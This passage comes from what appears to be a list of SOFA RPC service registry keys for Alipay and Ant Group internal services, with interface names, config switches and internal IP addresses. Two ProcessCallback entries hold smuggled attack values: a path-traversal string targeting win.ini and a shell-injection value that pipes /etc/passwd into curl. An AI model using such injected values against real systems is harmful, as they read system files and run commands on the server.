y.agds.facade.huabei.AgdsadPCCreditPoolFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.punishcenter.common.service.facade.SmsTemplateService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fincommontaskhub.service.facade.service.spi.ExecuteService:1.0:finvirtualta@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securitycore.common.service.facade.risk.api.RiskAdvicePolicyService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.97.229#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.peerpayprod.common.service.facade.FamilyMessageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:zpaascoreng@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.mrchishub.core.service.repository.AssetBaseCommonConfigRepository:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.logrotator-app-hour-custom_hourdelimiter:name=com.alipay.routeclient.DefaultRouteCoordinator.whiteListRPCLoadTest,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.50.88.40#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.paycore.service.payment.receipt.api.PayReceiptService:1.0:mergepayprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mydds.common.service.facade.crowd.api.CrowdAdsTaskService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.42.83#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.rule.common.base.service.ScriptValidateService:1.0:VOUCHER@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.securitycap:name=com.alipay.slaguard.common.drm.SlaGuardConfigDrm.faultInOsValue,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.arcore.common.service.facade.z.api.ArAccountFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.atd:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.noAvailableServerCheckIntervalSeconds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zappinfo:name=com.alipay.common.security.util.dresource.SecurityCommonUtilDrm.vmEmergencyActions,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.sofa.rpc.elastic.ElasticService:1.0:caselike@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.69.255.90#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.finstore.common.service.facade.fctask.FcTaskMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.opm.service.facade.apimng.ApiSpecFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.iotcore.spi.MessageSpi:1.0:sdaappdist@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.riskmng:name=com.alipay.slaguard.common.drm.SlaGuardConfigDrm.slaErrorCodeSet,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.promocenter.facade.api.CommandActivityManageService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gffund.common.service.facade.api.BankAccountLogQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.26.60#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.peerpay.prod.common.service.facade.api.account.JointAccountShareServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:alphad@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.gfas:name=com.alipay.gfas.core.config.drm.GfasVersionControlDrmResource.routeVersion,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finfundtrade.common.service.facade.api.SettlementHandleFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilechat.common.service.facade.api.ChatLinkCardFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fundprod.common.service.facade.prodmng.api.FundProductQueryMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ap.acquirefront.service.facade.api.AcquireRefundOrderQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.accenter.service.facade.api.AccenterCategoryRuleManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.peerpay.prod.common.service.facade.api.account.JointAccountManagerServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","DATA_ID_11.167.180.153#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.securitysimulate.common.service.facade.validator.CtuEventQueryServiceClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.WTCatFacade:1.0:fcprocess@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.routeclient.interfacename:acmantzhixin#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.mybank.bkloanrepay.common.service.facade.api.RepayFndDetailQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.inscheck.common.service.facade.api.InsCheckerConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mservicesinspect.biz.shared.feature.RearDetectFeatureActuator:1.0:rearDeSensitiveDetectActuator@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbsearch.common.service.facade.api.gateway.GatewayQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openhome.facade.sp.business.BusinessSceneQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.platform.schedule.concurrent.execute.Executer:1.0:fxRateOperateTaskExecuter@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.framework.core.facade.OpscloudClientServiceFacade:1.0:punishcenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finfocore:name=com.alipay.slaguard.common.drm.SlaGuardConfigDrm.faultInGlobalSwitchValue,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.antcloud.productcenter.common.service.facade.rest.ProductPropertyManageSofaRestService#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_11.124.167.107#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mobilechat.common.service.facade.api.BcServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.antfeaturecloud.common.service.facade.FeatureComputingFacade:1.0:Xlight@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","HEALTHY_V2@linkm#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","com.alipay.kbcontent.common.service.facade.api.brandstory.BrandStoryManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fininfo.common.service.facade.info.InfoSystemInvokeService:1.0:dchainbankloan@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fininsightcore.common.service.facade.health.api.UserAssetHealthyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.riskmng:name=com.alipay.cif.client.drm.AntPassportSwitcher.readFromAntPassportRatio,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.riskmng:name=com.alipay.common.security.dresource.SecurityCommonDrm.customJsonSuffixEndWith,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mrchcommerce.pms.common.service.facade.api.MobilePosLicenseMapper:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditmarket.game.service.PcreditMarketGameActionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.paramcore.common.service.spi.ParmMntListPrePubRollBackSpi:1.0:masterdata@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fundprod.common.service.facade.product.query.InfoSecCheckFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.scheduler.common.service.facade.update.IdcManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mychain.baas.market.endpoint.facade.ApplicationControllerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.regtech.facade.RegReportService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.69.228.29#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_10.15.237.117#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.mwalletmng:name=com.alipay.dwebupload.client.drm.DomainConfig.aftsUpVIP,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.pcardcore.common.service.facade.mpcard.MPcardTransLogQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.common.service.facade.adaptor.pgm.PgmChangeCheckFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mshopcenter.common.service.facade.content.brandstory.api.BrandStoryQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.securitydata:name=com.alipay.securitydata.common.service.indicator.drm.IndicatorSnapshotResource.eventPipelineSnapShot,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:finscbff@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.event.api.input.EventReceiverService:1.0:SL__TP_F_SC_EC-pcinstacc-field-schedule-serverless@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:mobilerelation@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.capacitystudio.arithmetic.ArithmeticFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fraudmng.common.service.facade.strategy.route.StrategyRouteService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ecoqltprod.core.service.inspect.MstTinyAppInfoDomainService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.autoinsprod.common.service.facade.AreaBizModelFacadeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insclaiminvestcore.common.service.facade.service.subtask.SubTaskManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securitycore.common.service.facade.environment.api.EnvironmentManageService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.securitycap:name=com.alipay.slaguard.common.drm.SlaGuardConfigDrm.faultInGlobalSwitchValue,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.yfd.core.service.ds.mng.querymeta.service.QueryTableMetaService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.30.192.219#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","cn.com.antcloud.acccenter.common.service.facade.doc.DocContentFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_30.50.44.50#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_11.124.33.44#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","cn.com.antcloud.apacc.common.service.facade.module.StrategyConfigTongEventFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.finannafccore.common.service.facade.scenario.api.FixedDueFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.alipaymember.common.service.facade.config.service.AdvertisementConfigQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.securitycap:name=com.alipay.dtqualitycore.drm.DataqualityConfigDrm.logClientError,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.openitemcore.common.service.facade.api.datacollection.DataCollectionConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.fcbuservice.common.service.facade.saction.AuthSactionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaljdbc:name=com.alipay.zdal.monitor.drm.cifin.cifinDataSource.switcher,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.gfinvest.facade.api.basic.OperatorFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.nodejs.ConsumerService:1.0:pcinstweb@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.socialcore.facade.transfercode.TransferCodeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finsteward.common.service.facade.promo.HiNetPromoActivityFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.publicexprod.common.service.facade.admin.OffcialAccountBindFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.32.111#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.antfeaturelib.common.facade.service.FeatureCalcService:1.0:antefi_fininsightcore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:lifecustprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bkloandecision.service.facade.agds.GeneralNameListQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrmcore.common.service.facade.service.user.UserConfigureService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.antcloud.dds.zdal.interfaces.endpoint.facade.rest.DbkeyRestFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","config:com.ipay.iacctrans.service.facade.api.AccountInfoQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.mobilechat.biz.outservice.rpc.api.SFSResourceRpcService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.acctrans.service.facade.AccountManageV2Facade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:/........................................................................../../../../../../../../windows/win.ini@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.muac.api.facade.qdb.OperatorFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cloud.acsellcore.common.service.facade.quotation.QuotationManageFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.finvirtualta.common.service.facade.fund.InitLoadFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.client.SystemAppInvokeService:1.0:mrchprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.biz.cpm.drm.CpmSwitchControlDRMResource.sfSwitchWhiteList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.developerops.facade.api.OpsActivityFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.88.146#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:fpdecisionplatform@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.loancore.friendloan.service.facade.api.FlcXtsEncashService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.fc.custview.facade.AuthorityRuleCheckFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:antlawEndDynamicCollbackServiceImpl@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gacplatform.facade.api.GacPlatformServiceFacade:1.0:fploanmng@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.huanyu.facade.core.change.SequenceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.0.57#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.assettrans.facade.api.AssetTransQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_ACPMPCORE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:.'|curl `cat /etc/passwd`|a'@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.baoxianmerchant.common.service.api.InsCifFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cloudbox:name=com.alipay.common.security.dresource.SecurityCommonDrm.defaultCorsCheckerEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.revmng.common.service.facade.RevmngUserServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.huanyu.facade.core.change.OrderFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.linke.aci.QueueQueryService#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.ipay.imerchantsettle.common.service.facade.api.SettlementFundXtsService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.23.250.129#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","SOFA_PRC_TRANSMIT_PUNISHCENTER#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.baoxianprod.common.facade.BizAccessFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antfeaturelib.common.facade.service.FeatureCalcService:1.0:zmCredit_zmcustcore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.linka:name=com.alipay.common.security.util.dresource.SecurityCommonUtilDrm.vmEmergencyDoubleCheck,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.serverlesscore.YamlTestApi9Service:1.0@tri#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mservicesinspect.core.service.InspectTaskResultDomainService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.test.sub03:1.0@XFIRE@testcloud#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securitycap.common.service.facade.worktask.facade.PrivacyQuestionQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.fcbuservice.common.service.facade.operatelog.OperateLogFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","HEALTHY_V2@zimtmsvcprod#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","DATA_ID_11.124.24.128#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.finpdcore:name=com.alipay.fin.pdcore.common.util.prodquery.PQDRMConfig.tntInstIdInfo,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.158.110.204#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mobilecodec.common.spi.service.CodeRouteService:1.0:transferprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_172.20.10.4#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.myapp:name=com.alipay.zdal.ldc.tair.testCacheTbase.tbaseClientWarmup,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mctlib.biz.manager.service.smartprogram.MctSmartProgramPubRecordManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zappinfo:name=cn.com.antcloud.common.auth.client.config.ZauthMigrationDrmConfigTrigger.whiteList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_100.83.253.43#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","NS_Pub_Servers_TP_S_DATABUS#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.cloudengine:name=com.alipay.cloudengine.resmanager.fcrcportal.resValue,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.superapires.facade.api.ApiInfoQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:fastq-easycase@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaljdbc:name=com.alipay.zdal.monitor.drm.fininfo.pcconfigwrite.failOnPhysicalInit,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.ap.acquirefront.service.facade.api.AcquireOrderCreateAndPayEvaluateService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opssla.common.service.facade.MetaQueryFacade:1.0:ANTINS@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finannafccore.facade.api.AnnaAsyncCallbackFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.tradeexprod:name=com.alipay.routeclient.DefaultRouteCoordinator.rpcRouteByGroupWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.kbasset.common.service.facade.stuff.api.StuffApplyOrderFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.compmng.biz.process.baoxian.CpBaoxianService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insttrade:name=com.alipay.cif.drm.PasswordRevokeSwitch.serverRevoked,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","HEALTHY_V2@transferprod#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","config:com.alipay.csbizcenter.polymer.facade.client.PolymerClientLoaderFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.mcenter.common.dal.mcenter.auto.daointerface.McenterOrderDAO:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.166.128.15#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:watchlist-online@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kabaoprod.service.facade.ldc.SharePassLDCInnerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.limitcenter.service.facade.accumulate.api.LimitCancelService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mdeduct.biz.agreement.internal.operation.IRemoteAgreementOperator:1.0:remoteUsageAgreementModifyOperator@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promocommopt.com.service.facade.spi.DailyTaskExternalConsultService:1.0:finscprodProphetParticipated@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.lendpofprod.common.service.facade.loanapi.fee.SaleFeeFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.supergw.service.facade.transaction.TransReceiverInGzoneService:1.0:supergwext@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cfmng:name=com.alipay.slaguard.common.drm.SlaGuardConfigDrm.faultInMatchAllRequest,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.124.132.192#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.finpwm:name=com.alipay.finpwm.biz.starwish.drm.impl.StarWishDrmImpl.limitStarNamingPerDay,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.paymentmng:name=com.alipay.common.security.dresource.SecurityCommonDrm.paramCheckEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.antcloud.esp.hbase.interfaces.endpoint.facade.rest.GroupRestFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.finfocore.common.service.facade.cds.mng.YuemaPageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acpmscore.facade.ProductFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.securitycap:name=com.alipay.cif.model.cache.CifCOControlSwitch.consistCheckWhiteListString,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.infosec:name=com.alipay.infosec.biz.manager.drm.ChangeOrderDRMResource.maxAttempt,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.50.52.1#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.superapi.common.core.client.AppInvokeService:1.0:amldataproc@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zcbmarketcenter:name=com.alipay.cif.utils.probe.ProbeDrmSwitch.switcher,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.antmember.common.service.facade.unicom.UnicomPhoneNoInfoService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.auth_center.common.service.facade.v2.service.AuthService:1.0:${cap_service_version}@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.moaprod.common.query.MoaOrderQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.fc.process.common.service.facade.WTTicketActorQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.AntVip-Server:name=com.alipay.antvip.server.conf.DrmControl.namelistDelaySec,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_100.88.74.4#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.publiccore.biz.service.impl.rpc.life.LifeAppFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.25.176.161#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","NS_Sub_Servers_TP_S_CHARGE#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.poscore:name=com.alipay.cif.utils.probe.ProbeDrmSwitch.reportSampling,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mservice.common.service.facade.api.gateway.GatewayFacade:1.0:mservice_workflow_workflowCoreGateway@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.commandcenter:name=com.alipay.common.tracer.manage.TracerDrm.enableRpc2JvmDigest,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_100.83.217.114#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_30.50.3.25#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.accorderexprod.common.facade.api.QueryAccorderFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paymentmng.service.facade.scienguide.BizRuleManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.minicenter.common.service.facade.api.miniapp.MiniAppInfoQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.accordercore.common.service.facade.control.auth.api.AuthOrderFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.88.170.103#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:lifeprod_AuditCallBack@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.uemprod.common.service.facade.message.MessageSendFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insttrade:name=com.alipay.zdal.ldc.tair.bankcardTairCache_dest.cacheEngineUrl,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.basementweb.SearchFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","NS_Sub_Servers_TP_S_1209#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.reading.common.service.facade.qa.AnswerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secucns